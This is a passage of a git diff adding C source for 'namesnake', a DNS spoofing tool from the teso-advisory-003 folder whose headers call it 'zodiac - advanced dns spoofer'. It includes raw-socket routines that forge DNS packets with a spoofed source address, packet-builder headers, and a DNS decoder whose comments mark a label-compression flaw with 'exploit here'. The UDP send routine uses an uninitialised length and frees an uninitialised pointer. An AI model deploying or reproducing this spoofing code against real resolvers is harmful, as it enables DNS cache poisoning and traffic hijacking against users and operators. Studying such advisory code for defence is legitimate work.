+        u_short count_ns, u_short count_ad, dns_pdata *pd)
+{
+        int             sock;           /* raw socket, yeah :) */
+        int             n;              /* temporary return value */
+        unsigned char   buf[4096];      /* final packet buffer */
+        unsigned char   *dbuf = pd->p_data;
+        size_t          dbuf_s = dns_build_plen (pd);
+        struct in_addr  s_addr,
+                        d_addr;
+
+
+        s_addr.s_addr = net_resolve (ip_src);
+        d_addr.s_addr = net_resolve (ip_dst);
+
+        libnet_build_dns (      dns_id,         /* dns id (the famous one, 'antilove'd by many users ;) */
+                                flags,          /* standard query response */
+                                count_q,        /* count for query */
+                                count_a,        /* count for answer */
+                                count_ns,       /* count for authoritative information */
+                                count_ad,       /* count for additional information */
+                                dbuf,           /* buffer with the queries/rr's */
+                                dbuf_s,         /* query size */
+                                buf + IP_H + UDP_H);            /* write into packet buffer */
+
+        libnet_build_udp (      prt_src,        /* source port */
+                                prt_dst,        /* 53 usually */
+                                NULL,           /* content already there */
+                                DNS_H + dbuf_s, /* same */
+                                buf + IP_H);    /* build after ip header */
+
+        libnet_build_ip (       UDP_H + DNS_H + dbuf_s, /* content size */
+                                0,              /* tos */
+                                libnet_get_prand (PRu16),       /* id :) btw, what does 242 mean ? */
+                                0,              /* frag */
+                                64,             /* ttl */
+                                IPPROTO_UDP,    /* subprotocol */
+                                s_addr.s_addr,  /* spoofa ;) */
+                                d_addr.s_addr,  /* local dns querier */
+                                NULL,           /* payload already there */
+                                0,              /* same */
+                                buf);           /* build in packet buffer */
+
+        libnet_do_checksum (buf, IPPROTO_UDP, UDP_H + DNS_H + dbuf_s);
+        libnet_do_checksum (buf, IPPROTO_IP, IP_H);
+
+        sock = libnet_open_raw_sock(IPPROTO_RAW);
+        if (sock == -1)
+                return (1);
+
+        n = libnet_write_ip (sock, buf, UDP_H + IP_H + DNS_H + dbuf_s);
+        if (n < UDP_H + IP_H + DNS_H + dbuf_s) {
+                return (1);
+        }
+
+        close (sock);
+
+        return (0);
+}
+
+
diff --git a/advisories/teso-advisory-003/namesnake/src/dns-build.h b/advisories/teso-advisory-003/namesnake/src/dns-build.h
new file mode 100644
index 0000000..ca3fe9c
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/dns-build.h
@@ -0,0 +1,211 @@
+/* namesnake
+ *
+ * dns packet builder routines include file
+ *
+ * by scut / teso
+ */
+
+#ifndef Z_DNS_BUILD_H
+#define Z_DNS_BUILD_H
+
+
+/* dns_pdata
+ *
+ * domain name service packet data part structure.
+ * the data in this structure is the virtual dns packet to fire.
+ */
+
+typedef struct  dns_pdata {
+        unsigned char   *p_offset;      /* internal offset to construct packet data */
+        unsigned char   *p_data;        /* real packet data pointer */
+} dns_pdata;
+
+
+/* dns_build_random
+ *
+ * prequel the domain name `domain' with a random sequence of characters
+ * with a random length if `len' is zero, and a fixed length if len is != 0
+ *
+ * return the allocated new string
+ */
+
+char            *dns_build_random (char *domain, size_t len);
+
+/* dns_domain
+ *
+ * return a pointer to the beginning of the SLD within a full qualified
+ * domain name `domainname'.
+ *
+ * return NULL on failure
+ * return a pointer to the beginning of the SLD on success
+ */
+
+char            *dns_domain (char *domainname);
+char            *dns_ptr_domain (char *arpaname);
+
+
+/* dns_build_new
+ *
+ * constructor. create new packet data body
+ *
+ * return packet data structure pointer (initialized)
+ */
+
+dns_pdata       *dns_build_new (void);
+
+
+/* dns_build_destroy
+ *
+ * destructor. destroy a dns_pdata structure pointed to by `pd'
+ *
+ * return in any case
+ */
+
+void            dns_build_destroy (dns_pdata *pd);
+
+
+/* dns_build_plen
+ *
+ * calculate the length of the current packet data body pointed to by `pd'.
+ *
+ * return the packet length
+ */
+
+u_short         dns_build_plen (dns_pdata *pd);
+
+
+/* dns_build_extend
+ *
+ * extend a dns_pdata structure data part for `amount' bytes.
+ *
+ * return a pointer to the beginning of the extension
+ */
+
+unsigned char   *dns_build_extend (dns_pdata *pd, size_t amount);
+
+
+/* dns_build_ptr
+ *
+ * take a numeric quad dot notated ip address `ip_str' and build a char
+ * domain out of it within the IN-ADDR.ARPA domain.
+ *
+ * return NULL on failure
+ * return a char pointer to the converted domain name
+ */
+
+char            *dns_build_ptr (char *ip_str);
+
+
+/* dns_build_q
+ *
+ * append a query record into a dns_pdata structure, where `dname' is the
+ * domain name that should be queried, using `qtype' and `qclass' as types.
+ *
+ * conversion of the `dname' takes place according to the value of `qtype':
+ *
+ * qtype    | expected dname format | converted to
+ * ---------+-----------------------+-----------------------------------------
+ * TY_PTR   | char *, ip address    | IN-ADDR.ARPA dns domain name
+ * TY_A     | char *, full hostname | dns domain name
+ * TY_NS    | "                     | "
+ * TY_CNAME | "                     | "
+ * TY_WKS   | "                     | "
+ * TY_HINFO | "                     | "
+ * TY_MINFO | "                     | "
+ * TY_MX    | "                     | "
+ *
+ * return (beside adding the record) the pointer to the record within the data
+ */
+
+unsigned char   *dns_build_q (dns_pdata *pd, char *dname, u_short qtype, u_short qclass);
+
+
+/* dns_build_rr
+ *
+ * append a resource record into a dns_pdata structure, pointed ty by `pd',
+ * where `dname' is the domain name the record belongs to, `type' and `class'
+ * are the type and class of the dns data part, `ttl' is the time to live,
+ * the time in seconds how long to cache the record. `rdlength' is the length
+ * of the resource data pointed to by `rdata'.
+ * depending on `type' the data at `rdata' will be converted to the appropiate
+ * type:
+ *
+ * type   | rdata points to     | will be
+ * -------+---------------------+---------------------------------------------
+ * TY_A   | char IP address     | 4 byte network byte ordered IP address
+ * TY_PTR | char domain name    | encoded dns domain name
+ * TY_NS  | char domain name    | encoded dns domain name
+ *
+ * return (beside adding the record) the pointer to the record within the data
+ */
+
+unsigned char   *dns_build_rr (dns_pdata *pd, unsigned char *dname,
+        u_short type, u_short class, u_long ttl, void *rdata);
+
+
+/* dns_build_query_label
+ *
+ * build a query label given from the data `query' that should be enclosed
+ * and the query type `qtype' and query class `qclass'.
+ *
+ * qtype        qclass          query
+ * -----------+---------------+-----------------------------------------------
+ * A            IN              pointer to a host- or domainname
+ * PTR          IN              pointer to a struct in_addr
+ *
+ * ... (to be extended) ...
+ *
+ * return 0 on success
+ * return 1 on failure
+ */
+int             dns_build_query_label (unsigned char **query_dst, u_short qtype, u_short qclass, void *query);
+
+
+/* dns_build_domain
+ *
+ * build a dns domain label sequence out of a printable domain name
+ * store the resulting domain in `denc', get the printable domain
+ * from `domain'.
+ *
+ * return 0 on failure
+ * return length of the created domain (include suffixing '\x00')
+ */
+
+int             dns_build_domain (unsigned char **denc, char *domain);
+
+
+/* dns_build_domain_dotlen
+ *
+ * helper routine, determine the length of the next label in a human
+ * printed domain name
+ *
+ * return the number of characters until an occurance of \x00 or '.'
+ */
+
+int             dns_build_domain_dotlen (char *label);
+
+
+/* dns_packet_send
+ *
+ * send a prepared dns packet spoofing from `ip_src' to `ip_dst', using
+ * source port `prt_src' and destination port `prt_dst'. the dns header
+ * data is filled with `dns_id', the dns identification number of the
+ * packet, `flags', which are the 16bit flags in the dns header, then
+ * four count variables, each for a dns segment: `count_q' is the number
+ * of queries, `count_a' the number of answers, `count_ns' the number of
+ * nameserver entries and `count_ad' the number of additional entries.
+ * the real dns data is aquired from the dns packet data `pd'.
+ * the dns data should be constructed using the dns_build_* functions.
+ * if the packet should be compressed before sending it, `compress'
+ * should be set to 1.
+ *
+ * return 0 on success
+ * return 1 on failure
+ */
+
+int             dns_packet_send (char *ip_src, char *ip_dst, u_short prt_src, u_short prt_dst,
+                        u_short dns_id, u_short flags, u_short count_q, u_short count_a,
+                        u_short count_ns, u_short count_ad, dns_pdata *pd);
+
+#endif
+
diff --git a/advisories/teso-advisory-003/namesnake/src/dns.c b/advisories/teso-advisory-003/namesnake/src/dns.c
new file mode 100644
index 0000000..c2c8c10
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/dns.c
@@ -0,0 +1,447 @@
+/* zodiac - advanced dns spoofer
+ *
+ * by scut / teso
+ *
+ * dns handling routines
+ *
+ * including scut's leet dns packet decoder *welp* :-D
+ *
+ */
+
+#include <sys/time.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <string.h>
+#include "common.h"
+#include "dns.h"
+
+
+extern char *   ns_domain;
+
+static char     *types[] = {    NULL, "A", "NS", "MD", "MF", "CNAME", "SOA", "MB", "MG",
+                                "MR", "NULL", "WKS", "PTR", "HINFO", "MINFO", "MX", "TXT" };
+static char     *rcodes[] = {   "OK", "EFORM", "EFAIL", "ENAME", "ENIMP", "ERFSD", NULL, NULL,
+                                NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL };
+
+
+/* dns_handle
+ *
+ * handle a dns packet with header pointed to by `dns_hdr' and data pointed
+ * to by `dns_data'.
+ *
+ * do all necessary queue / decoding stuff
+ */
+
+void
+dns_handle (dns_hdr *dns, unsigned char *dns_data, unsigned int plen, int print)
+{
+        int             n;                      /* temporary return value */
+        unsigned char   *d_quer[SEG_COUNT_MAX]; /* query array */
+        unsigned char   *d_answ[SEG_COUNT_MAX]; /* answer array */
+        unsigned char   *d_auth[SEG_COUNT_MAX]; /* authority array */
+        unsigned char   *d_addi[SEG_COUNT_MAX]; /* additional array */
+        char            dns_p[2048];            /* output (for humans :) */
+
+#ifdef  PDEBUG
+        hexdump ("packet-dns", (unsigned char *) dns, 256);
+#endif
+        /* segmentify dns packet
+         */
+        n = dns_segmentify (dns, dns_data, d_quer, d_answ, d_auth, d_addi);
+        if (n != 0) {
+                printf ("FAILURE ON DNS PACKET DISASSEMBLY\n");
+                return;
+        }
+
+        memset (dns_p, '\0', sizeof (dns_p));
+
+        /* only print own packets if dns_print_own_packets is 1
+         */
+        dns_printpkt (dns_p, sizeof (dns_p) - 1, dns,
+                dns_data, d_quer, d_answ, d_auth, d_addi, print);
+
+        /* return
+         */
+        return;
+} 
+
+
+/* dns_p_print
+ *
+ * decode a dns packet pointed to by `dns' and `dns_data' to a human readable
+ * form to the string pointed to by `os', with a maximum length of `len'
+ *
+ * return 0 on success
+ * return 1 on failure
+ */
+
+int
+dns_p_print (char *os, size_t len, dns_hdr *dns, unsigned char *d_quer[], unsigned char *d_answ[],
+        unsigned char *d_auth[], unsigned char *d_addi[])
+{
+        int     n;
+
+        scnprintf (os, len, "ID[%04x] TYPE[", ntohs (dns->id));
+
+        if (dns->qr == 0) {
+                /* print the query
+                 */
+                if (dns->opcode != 0 && dns->opcode != 1) {
+                        scnprintf (os, len, "unsupported opcode %02x %s", dns->opcode,
+                                (dns->opcode == 3) ? "ST]" : "");
+                } else {
+                        if (dns->opcode == 0)
+                                scnprintf (os, len, " Q]");
+                        else if (dns->opcode == 1)
+                                scnprintf (os, len, "IQ]");
+                }
+        } else if (dns->qr == 1) {
+                char    *rcstr = NULL;
+
+                /* authoritative answer ?
+                 */
+                if (dns->aa == 1)
+                        scnprintf (os, len, "AA]");
+                else
+                        scnprintf (os, len, " A]");
+
+                rcstr = rcodes[dns->rcode];
+                scnprintf (os, len, "(%s)", (rcstr == NULL) ? "?" : rcstr);
+        }
+
+        for (n = 0; n < ntohs (dns->qdcount) && n < SEG_COUNT_MAX; n++) {
+                if (n == 0)
+                        scnprintf (os, len, " Q(%hu)> ", ntohs (dns->qdcount));
+                dns_p_q ((unsigned char *) dns, os, len, d_quer[n]);
+        }
+
+        return (0);
+}
+
+
+/* dns_p_q
+ *
+ * print a dns query record pointed to by `wp' as a human readable string,
+ * and append it to `os', which can have a maximum size of `len' characters.
+ */
+
+void
+dns_p_q (unsigned char *dns_start, char *os, size_t len, unsigned char *wp)
+{
+        char            qname[256];
+        char            *qt;
+        u_short         qtype, qclass;
+
+        memset (qname, '\0', sizeof (qname));
+        dns_dcd_label (dns_start, &wp, qname, sizeof (qname) - 1, 5);
+
+        /* get query type and class
+         */
+        GETSHORT (qtype, wp);
+        GETSHORT (qclass, wp);
+
+        if (qtype <= 16)
+                qt = types[qtype];
+        else
+                qt = NULL;
+
+        ns_domain = xstrdup (qname);
+        scnprintf (os, len, "%s [t:%s]", qname, (qt != NULL) ? qt : "-");
+
+        return;
+}
+
+
+/* dns_p_rdata
+ *
+ * print a resource record rdata field pointed to by `rdp' as a human readable
+ * string `rdstr' with a maximum length `len', depending on rdata type `rtype'
+ * the data pointed to by `rdp' has the length `rdlen'.
+ *
+ * return nothing
+ */
+
+void
+dns_p_rdata (unsigned char *dns_start, char *rdstr, size_t len,
+        u_short rtype, unsigned char *rdp, u_short rdlen)
+{
+        char            *ips;
+        char            ipv4str[64];    /* temporary IP address string */
+        struct in_addr  ip;
+        unsigned char   *wps = rdp;
+
+        memset (rdstr, '\0', len);
+
+        switch (rtype) {
+        case (T_A):
+                memcpy (&ip, rdp, sizeof (struct in_addr));
+
+                ips = ipv4_print (ipv4str, ip, 0);
+                scnprintf (rdstr, len, "%s", ips);
+
+                break;
+
+        case (T_CNAME):
+        case (T_NS):
+        case (T_PTR):
+                dns_dcd_label (dns_start, &wps, rdstr, len, 5);
+                break;
+
+        default:
+                break;
+        }
+
+        return;
+}
+
+
+/* dns_p_rr
+ *
+ * print a dns resource record pointed to by `wp' as a human readable string,
+ * and append it to `os', which can have a maximum size of `len' characters.
+ */
+
+void
+dns_p_rr (unsigned char *dns_start, char *os, size_t len, unsigned char *wp)
+{
+        char    name[256], rdatas[256];
+        char    *t;
+        u_short type, class, rdlen;
+        u_long  ttl;
+
+        /* decode label
+         */
+        memset (name, '\0', sizeof (name));
+        dns_dcd_label (dns_start, &wp, name, sizeof (name), 5);
+
+        /* get type/class/ttl/rdlength/rdata
+         * then assign appropiate type description
+         */
+        GETSHORT (type, wp);
+        GETSHORT (class, wp);
+        GETLONG (ttl, wp);
+        GETSHORT (rdlen, wp);
+        t = (type <= 16) ? types[type] : NULL;
+
+        /* add decoded rdata info into rdatas
+         * different decoding depending on type
+         */
+        dns_p_rdata (dns_start, rdatas, sizeof (rdatas), type, wp, rdlen);
+
+        scnprintf (os, len, "[t: %s (%04x)][c: %04x][ttl: %lu][r: %04x] %s : %s",
+                (t != NULL) ? t : "-", type, class, ttl, rdlen, name, rdatas);
+
+        return;
+}
+
+
+/* dns_segmentify
+ *
+ * segmentify a dns datagram pointed to by `dns_hdr' and `dns_data' into it's
+ * different parts, such as the query part (pointed to by `d_quer'), the
+ * answer part (pointed to by `d_answ'), the authoritaty (pointed to by
+ * `d_auth') and the additional information parts (pointed to by `d_addi').
+ *
+ * return 0 on success, and fill all the **-pointers to either NULL or data
+ *                      within the `dns_data' array.
+ */
+
+int
+dns_segmentify (dns_hdr *dns, unsigned char *dns_data,
+        unsigned char *d_quer[], unsigned char *d_answ[], unsigned char *d_auth[],
+        unsigned char *d_addi[])
+{
+        unsigned char   *wp;    /* work pointer */
+
+        wp = dns_data;
+
+        /* get queries, answers, authorities and additional information
+         */
+        dns_seg_q (&wp, d_quer, htons (dns->qdcount), SEG_COUNT_MAX);
+        dns_seg_rr (&wp, d_answ, htons (dns->ancount), SEG_COUNT_MAX);
+        dns_seg_rr (&wp, d_auth, htons (dns->nscount), SEG_COUNT_MAX);
+        dns_seg_rr (&wp, d_addi, htons (dns->arcount), SEG_COUNT_MAX);
+
+        return (0);
+}
+
+
+/* dns_seg_q
+ *
+ * segmentify a query record of a dns datagram, starting at `wp', creating
+ * an array of `c' number of pointers in `d_arry', truncating if it exceeds
+ * a number of `max_size' records
+ */
+
+void
+dns_seg_q (unsigned char **wp, unsigned char *d_arry[], int c, int max_size)
+{
+        int     count;
+
+        for (count = 0; count < c && count < max_size; count++) {
+                d_arry[count] = *wp;
+                *wp += dns_labellen (*wp);      /* skip label */
+                *wp += 2 * sizeof (u_short);    /* skip qtype/qclass */
+        }
+}
+
+
+/* dns_seg_rr
+ *
+ * segmentify a resource record of a dns datagram, starting at `wp', creating
+ * an array of `c' number of pointers in `d_arry', truncating if it exceeds
+ * a number of `max_size' records
+ */
+
+void
+dns_seg_rr (unsigned char **wp, unsigned char *d_arry[], int c, int max_size)
+{
+        int                     count;
+        unsigned long int       rdlen;
+
+        for (count = 0; count < c && count < max_size; count++) {
+                d_arry[count] = *wp;
+
+                /* skip the label (most likely compressed)
+                 */
+                *wp += dns_labellen (*wp);
+
+                /* skip the type, class, ttl
+                 */
+                *wp += 8 * sizeof (u_char);
+
+                /* resource data length
+                 */
+                GETSHORT (rdlen, *wp);
+                *wp += rdlen;
+        }
+
+        return;
+}
+
+
+/* dns_labellen
+ *
+ * determine the length of a dns label pointed to by `wp'
+ *
+ * return the length of the label
+ */
+
+int
+dns_labellen (unsigned char *wp)
+{
+        unsigned char   *wps = wp;
+
+        while (*wp != '\x00') {
+                /* in case the label is compressed we don't really care,
+                 * but just skip it
+                 */
+                if ((*wp & INDIR_MASK) == INDIR_MASK) {
+                        wp += sizeof (u_short);
+
+                        /* non-clear RFC at this point, got to figure with some
+                         * real dns packets
+                         */
+                        return ((int) (wp - wps));
+                } else {
+                        wp += (*wp + 1);
+                }
+        }
+
+        return ((int) (wp - wps) + 1);
+}
+
+
+/* dns_dcd_label
+ *
+ * decode a label sequence pointed to by `qname' to a string pointed to by
+ * `os', with a maximum length of `len' characters
+ * after successful decoding it will update *qname, to point to the qtype
+ * if the `dig' flag is > 0 the routine may allow to call itself recursively
+ * at a maximum dig level of `dig'.
+ * if `dig' is zero it is a recursive call and may not call itself once more.
+ * `dns_start' is a pointer to the beginning of the dns packet, to allow
+ * compressed labels to be decoded.
+ *
+ * return 0 on success
+ * return 1 on failure
+ */
+
+int
+dns_dcd_label (unsigned char *dns_start, unsigned char **qname, char *os, size_t len, int dig)
+{
+        unsigned char   *qn = *qname;
+
+        while (*qn != '\0') {
+                if ((*qn & INDIR_MASK) == INDIR_MASK) {
+                        int             offset; /* compression offset */
+                        unsigned char   *tpt;   /*temporary pointer */
+
+                        if (dig == 0) {
+                                if (dns_start == NULL)
+                                        return (1);
+
+                                printf ("DNS attack, compr. flaw exploit attempt\n");
+                                return (1);
+                        }
+
+                        /* don't fuck with big bad endian
+                         */
+                        
+                        offset = (((unsigned char) *qn) & ~0xc0) << 8;
+                        qn += 1;
+                        offset += (int) ((unsigned char) *qn);
+                        qn += 1;
+
+                        /* recursivly decode the label pointed to by the offset
+                         * exploit here =)
+                         */
+                        
+                        tpt = dns_start + offset;
+                        *qname = qn;
+
+                        return (dns_dcd_label (dns_start, &tpt, os, len, dig - 1));
+
+                } else {
+                        char    label[65];
+
+                        memset (label, '\0', sizeof (label));
+                        memcpy (label, qn + 1, (*qn & ~INDIR_MASK));
+                        scnprintf (os, len, "%s", label);
+                }
+
+                qn += *qn + 1;
+                if (*qn != 0)
+                        scnprintf (os, len, ".");
+        }
+
+        *qname = qn + 1;
+
+        return (0);
+}
+
+/* dns_printpkt
+ *
+ * print dns packet header pointed to by `dns' in human readable form
+ * to dns window
+ *
+ * return nothing
+ */
+
+void
+dns_printpkt (char *os, size_t osl, dns_hdr *dns, unsigned char *data,
+        unsigned char *d_quer[], unsigned char *d_answ[], unsigned char *d_auth[],
+        unsigned char *d_addi[], int print)
+{
+        /* print decoded dns packet to screen
+         */
+        dns_p_print (os, osl, dns, d_quer, d_answ, d_auth, d_addi);
+        if (print == 1)
+                printf ("%s\n", os);
+
+        return;
+}
+
diff --git a/advisories/teso-advisory-003/namesnake/src/dns.h b/advisories/teso-advisory-003/namesnake/src/dns.h
new file mode 100644
index 0000000..2445231
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/dns.h
@@ -0,0 +1,67 @@
+/* zodiac - advanced dns spoofer
+ *
+ * by scut / teso
+ *
+ * dns / id queue handling routines
+ */
+
+#ifndef Z_DNS_H
+#define Z_DNS_H
+
+
+#include <sys/time.h>
+#include <arpa/nameser.h>
+#include <netinet/in.h>
+#include <libnet.h>
+
+
+/* dns flags (for use with libnet)
+ */
+#define DF_RESPONSE     0x8000
+#define DF_OC_STD_Q     0x0000
+#define DF_OC_INV_Q     0x0800
+#define DF_OC_STAT      0x1800
+#define DF_AA           0x0400
+#define DF_TC           0x0200
+#define DF_RD           0x0100
+#define DF_RA           0x0080
+#define DF_RCODE_FMT_E  0x0001
+#define DF_RCODE_SRV_E  0x0002
+#define DF_RCODE_NAME_E 0x0003
+#define DF_RCODE_IMPL_E 0x0004
+#define DF_RCODE_RFSD_E 0x0005
+
+
+#define SEG_COUNT_MAX   16
+
+typedef struct libnet_ip_hdr            ip_hdr;
+typedef struct libnet_udp_hdr           udp_hdr;
+typedef HEADER                          dns_hdr;        /* HEADER is in arpa/nameser.h */
+
+void    dns_handle (dns_hdr *dns, unsigned char *dns_data, unsigned int plen, int print);
+
+int     dns_segmentify (dns_hdr *dns, unsigned char *dns_data,
+                unsigned char *d_quer[], unsigned char *d_answ[], unsigned char *d_auth[],
+                unsigned char *d_addi[]);
+void    dns_seg_q (unsigned char **wp, unsigned char *d_arry[], int c, int max_size);
+void    dns_seg_rr (unsigned char **wp, unsigned char *d_arry[], int c, int max_size);
+int     dns_labellen (unsigned char *wp);
+
+/* dns_printpkt
+ *
+ * print a packet into the dns window
+ */
+
+void    dns_printpkt (char *os, size_t osl, dns_hdr *dns, unsigned char *data,
+                unsigned char *d_quer[], unsigned char *d_answ[], unsigned char *d_auth[],
+                unsigned char *d_addi[], int print);
+int     dns_p_print (char *os, size_t len, dns_hdr *dns, unsigned char *d_quer[],
+                unsigned char *d_answ[], unsigned char *d_auth[], unsigned char *d_addi[]);
+void    dns_p_q (unsigned char *dns_start, char *os, size_t len, unsigned char *wp);
+void    dns_p_rr (unsigned char *dns_start, char *os, size_t len, unsigned char *wp);
+void    dns_p_rdata (unsigned char *dns_start, char *rdstr, size_t len, u_short rtype,
+                unsigned char *rdp, u_short rdlen);
+int     dns_dcd_label (unsigned char *dns_start, unsigned char **qname, char *os, size_t len, int dig);
+
+#endif
+
diff --git a/advisories/teso-advisory-003/namesnake/src/io-udp.c b/advisories/teso-advisory-003/namesnake/src/io-udp.c
new file mode 100644
index 0000000..277f17a
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/io-udp.c
@@ -0,0 +1,212 @@
+/* namesnake
+ *
+ * by scut
+ *
+ * udp packet routines include file
+ */
+
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/time.h>
+#include <netinet/in.h>
+#include <netinet/ip.h>
+#include <arpa/inet.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <libnet.h>
+#include "common.h"
+#include "io-udp.h"
+#include "network.h"
+
+
+void
+udp_listen_free (udp_listen *ul)
+{
+        if (ul == NULL)
+                return;
+
+        if (ul->socket != 0)
+                close (ul->socket);
+
+        free (ul);
+
+        return;
+}
+
+
+udp_listen *
+udp_setup (char *ip, unsigned short int port)
+{
+        int             n;      /* temporary return value */
+        udp_listen      *new = xcalloc (1, sizeof (udp_listen));
+
+        new->addr_serv.sin_family = AF_INET;
+        new->addr_serv.sin_port = htons (port);
+
+        if (ip == NULL) {
+                new->addr_serv.sin_addr.s_addr = htonl (INADDR_ANY);
+        } else {
+                new->addr_serv.sin_addr.s_addr = net_resolve (ip);
+                if (new->addr_serv.sin_addr.s_addr == 0)
+                        goto u_fail;
+        }
+
+        new->port = port;
+
+        /* aquire udp socket
+         */
+        new->socket = socket (AF_INET, SOCK_DGRAM, 0);
+        if (new->socket == -1)
+                goto u_fail;
+
+        n = bind (new->socket, (struct sockaddr *) &new->addr_serv, sizeof (new->addr_serv));
+        if (n == -1)
+                goto u_fail;
+
+        return (new);
+
+u_fail:
+        if (new->socket != 0)
+                close (new->socket);
+
+        free (new);
+
+        return (NULL);
+}
+
+
+void
+udp_rcv_free (udp_rcv *ur)
+{
+        if (ur == NULL)
+                return;
+
+        if (ur->udp_data != NULL)
+                free (ur->udp_data);
+
+        free (ur);
+
+        return;
+}
+
+
+udp_rcv *
+udp_receive (udp_listen *ul, struct timeval *tv)
+{
+        int             n;      /* temporary return value */
+        udp_rcv         *u_rcv; /* new received udp datagram */
+        unsigned char   *u_packet;
+        socklen_t       len;
+        fd_set          fds;
+
+        if (ul == NULL)
+                return (NULL);
+
+        u_rcv = xcalloc (1, sizeof (udp_rcv));
+        u_packet = xcalloc (1, IP_MAXPACKET);
+
+        len = sizeof (struct sockaddr_in);
+        FD_ZERO (&fds);
+        FD_SET (ul->socket, &fds);
+        n = select (ul->socket + 1, &fds, NULL, &fds, tv);
+        if (n <= 0)
+                goto ur_fail;
+
+        n = recvfrom (ul->socket, u_packet, IP_MAXPACKET, 0,
+                &u_rcv->addr_client, &len);
+        if (n == -1)
+                goto ur_fail;
+
+        /* save time the packet was received and copy the received data
+         */
+        gettimeofday (&u_rcv->udp_time, NULL);
+        xrealloc (u_packet, n);
+        u_rcv->udp_data = u_packet;
+        u_rcv->udp_len = n;
+        ul->count++;
+
+        return (u_rcv);
+
+ur_fail:
+        free (u_rcv);
+        free (u_packet);
+
+        return (NULL);
+}
+
+
+void
+udp_write (char *ip, unsigned short int port, unsigned char *data,
+        size_t data_len)
+{
+        int                     udp_sockfd;
+        struct sockaddr_in      udp_to;
+
+        udp_sockfd = socket (AF_INET, SOCK_DGRAM, 0);
+        if (udp_sockfd == -1)
+                return;
+
+        memset (&udp_to, '\0', sizeof (udp_to));
+        udp_to.sin_family = AF_INET;
+        udp_to.sin_addr.s_addr = net_resolve (ip);
+        udp_to.sin_port = htons (port);
+
+        /* send packet
+         */
+        sendto (udp_sockfd, data, data_len, 0, &udp_to, sizeof (udp_to));
+
+        close (udp_sockfd);
+
+        return;
+}
+
+
+void
+udp_send (char *ip_src, unsigned short int port_src,
+        char *ip_dst, unsigned short int port_dst,
+        unsigned char *data, size_t data_len)
+{
+        unsigned char           *data_enc,
+                                *pkt_buf;
+        unsigned short int      port_a_src;
+        size_t                  len;
+        char                    *ip_a_src;
+        int                     raw_socket;
+
+        ip_a_src = (ip_src == NULL) ? net_getlocalip () : xstrdup (ip_src);
+        port_a_src = (port_src == 0) ? libnet_get_prand (PRu16) : port_src;
+        pkt_buf = xcalloc (1, data_len + IP_H + UDP_H);
+
+        libnet_build_ip (UDP_H + len,           /* content length */
+                0,                              /* ip type of service */
+                libnet_get_prand (PRu16),       /* ip id */
+                0,                              /* we don't fragment */
+                64,                             /* ip ttl */
+                IPPROTO_UDP,                    /* ip subproto */
+                libnet_name_resolve (ip_a_src, 0),      /* ip source address */
+                libnet_name_resolve (ip_dst, 0),/* ip destination address */
+                NULL, 0,                        /* payload */
+                pkt_buf);
+
+        libnet_build_udp (port_a_src,           /* source port */
+                port_dst,                       /* destination port */
+                data,                   /* payload r0x0r */
+                data_len,                               /* payload length */
+                pkt_buf + IP_H);
+
+        raw_socket = libnet_open_raw_sock (IPPROTO_RAW);
+
+        if (raw_socket != -1) {
+                libnet_write_ip (raw_socket, pkt_buf, IP_H + UDP_H + len);
+
+                close (raw_socket);
+        }
+
+        free (pkt_buf);
+        free (data_enc);
+        free (ip_a_src);
+
+        return;
+}
+
diff --git a/advisories/teso-advisory-003/namesnake/src/io-udp.h b/advisories/teso-advisory-003/namesnake/src/io-udp.h
new file mode 100644
index 0000000..8a6775a
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/io-udp.h
@@ -0,0 +1,121 @@
+/* namesnake
+ *
+ * by scut
+ *
+ * udp packet routines include file
+ */
+
+#ifndef _FNX_IO_UDP_H
+#define _FNX_IO_UDP_H
+
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/time.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <stdio.h>
+
+
+/* udp receival entity
+ */
+
+typedef struct  udp_listen {
+        unsigned long int       count;  /* number of packets received */
+        struct in_addr          ip;     /* ip to receive data on */
+        unsigned short int      port;   /* port to receive data on */
+        int                     socket; /* listening socket */
+        struct sockaddr_in      addr_serv;
+} udp_listen;
+
+
+/* udp datagram structure
+ */
+
+typedef struct  udp_rcv {
+        struct sockaddr_in      addr_client;    /* source address */
+        struct timeval          udp_time;       /* time of receival */
+        socklen_t               udp_len;        /* length of the udp datagramm */
+        unsigned char           *udp_data;      /* received udp datagramm */
+} udp_rcv;
+
+
+/* udp_listen_free
+ *
+ * free a udp_listen structure pointed to by `ul'
+ *
+ * return in any case
+ */
+
+void    udp_listen_free (udp_listen *ul);
+
+
+/* udp_setup
+ *
+ * start a new listening udp service with the bound ip `ip', which can be
+ * either a numeric ip address or "*" (or NULL) for all locally available
+ * ip addresses. the listening port is `port'.
+ *
+ * return NULL on failure
+ * return a pointer to a udp_listen structure on success
+ */
+
+udp_listen      *udp_setup (char *ip, unsigned short int port);
+
+
+/* udp_rcv_free
+ *
+ * free a udp_rcv structure pointed to by `ur'
+ *
+ * return in any case
+ */
+
+void    udp_rcv_free (udp_rcv *ur);
+
+
+/* udp_receive
+ *
+ * receive an udp datagramm on the network entity specified by the `ul'
+ * structure
+ *
+ * return NULL on failure
+ * return a pointer to a new udp_rcv structure on success
+ */
+
+udp_rcv *udp_receive (udp_listen *ul, struct timeval *tv);
+
+
+/* udp_write
+ *
+ * send an udp datagram using the system level datagram sockets. send
+ * `data_len' bytes from `data' to the host with the ip `ip' on port
+ * `port'
+ *
+ * return in any case
+ */
+
+void
+udp_write (char *ip, unsigned short int port, unsigned char *data,
+        size_t data_len);
+
+
+/* udp_send
+ *
+ * send an udp datagram using raw socket. the datagram will be assigned the
+ * source ip address of the local host if `ip_src' is NULL and the source IP
+ * address `ip_src' if it is not. the source port will be random if `port_src'
+ * equals zero, else it is assigned the value of it.
+ * the destination ip address is `ip_dst', the destination port is `port_dst'..
+ * the payload is `data', which is `data_len' bytes long. the data will be
+ * encrypted with `key' if it is not NULL.
+ *
+ * return in any case
+ */
+
+void    udp_send (char *ip_src, unsigned short int port_src,
+        char *ip_dst, unsigned short int port_dst,
